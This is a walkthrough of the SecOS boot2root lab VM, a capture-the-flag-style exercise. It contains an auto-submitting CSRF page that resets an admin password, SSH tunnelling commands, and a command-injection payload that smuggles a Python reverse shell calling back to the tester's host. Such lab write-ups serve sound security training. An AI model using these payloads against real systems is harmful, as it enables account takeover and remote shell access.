SecOS Challenge

The official description of SecOS reads as follows:

Not too tired after BSides London? Still want to solve challenges? Here is the VM I told about during my talk where you'll have to practice some of your skills to retrieve the precious flag located here: /root/flag.txt. This VM is an entry-level boot2root and is web based.

This VM is the first of a series which I'm currently creating where there will be links between all of them. Basically, each machine in the series will rely/depend on each other, so keep the flags for the next VMs.

This has been tested on VirtualBox and gets its IP from the DHCP server. Moreover, if you find yourself bruteforcing, you're doing something wrong. It is not needed and it wasn't designed to be done this way. Instead, focus on exploiting web bugs!

If you have any questions, feel free to ask me on Twitter @PaulWebSec or throw me a mail: paulwebsec(at)gmail(dot)com


1. Download

SecOS-1.tar.gz (Size: 599 MB)
Download (Mirror): http://download.vulnhub.com/secos/SecOS-1.tar.gz
Download (Torrent): http://download.vulnhub.com/secos/SecOS-1.tar.gz.


2. SecOS host discovery and port scanning

Before port scanning, first perform host discovery to save scan time.

From the output above:
SecOS host IP: 192.168.1.110
Tester host IP: 192.168.1.113

3. Service detection: CSRF vulnerability found

After the vulnerability scan, the host is found to expose ssh and http (8081). Examining port 8081 reveals the following usable web pages:

http://192.168.1.110:8081/
http://192.168.1.110:8081/about
http://192.168.1.110:8081/change-password
http://192.168.1.110:8081/hint
http://192.168.1.110:8081/login
http://192.168.1.110:8081/logout
http://192.168.1.110:8081/messages
http://192.168.1.110:8081/send-message
http://192.168.1.110:8081/sign-up
http://192.168.1.110:8081/user
http://192.168.1.110:8081/users


On the page http://192.168.1.110:8081/hint, useful information is found:

<div class="jumbotron">
     <p><i>Are you sure there's something to see here?</i></p>
     <!--
             First: the admin visits the website (really) frequently
             Second: He runs it locally, on 127.0.0.1.
             Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough
     !-->
</div>


Further checking confirms that the CSRF issue is real. The next step is to build a CSRF attack page and send its link to the administrator in a message. The attack page is hosted on the tester's host 192.168.1.113 with the following code:


<html>
<head>
  <title>CSRF - Password Reset</title>
  <script type="text/javascript">
    function Foo()
    {
      document.getElementById("csrf").submit()
    }
  </script>
</head>
<body onload=Foo()>
  <form id="csrf" action="http://127.0.0.1:8081/change-password" method="POST">
    <input type="text" name="username" value="spiderman">
    <input type="password" name="password" value="password">
    <button type="submit">Change Password</button>
  </form>
</body>
</html>



4. Obtaining the SSH password; command execution vulnerability found


After the CSRF link is sent to the administrator in a message, the link is opened automatically within a few minutes and the password is reset.

Log in to the host over SSH with the account spiderman/CrazyPassword!. The directories /tmp and /vnwa are found; the file internalServer.js under /vnwa has a command execution issue, but the service is only reachable locally.

Use SSH to set up a SOCKS proxy; this lets the tester reach ports inside the SecOS environment through the proxy port.

ssh -D 1080 -N -f spiderman@192.168.1.110

With this command in place, the tester can reach port 9000 through the proxy.

ssh -L 80:127.0.0.1:9000 spiderman@192.168.1.110

With the second command, port 9000 on SecOS is forwarded to port 80 on the tester's host and can be accessed directly (ssh -L binds a port on the tester's own host, so binding port 80 requires root privileges),


and the command is injected successfully. Assuming the tester listens on local port 4444 (on 192.168.1.113), the following payload yields a reverse shell:

-c4 127.0.0.1;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.113",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



References:

http://vulnhub.com/entry/secos-1,88/
http://resources.infosecinstitute.com/secos-challenge/#comment-1182247

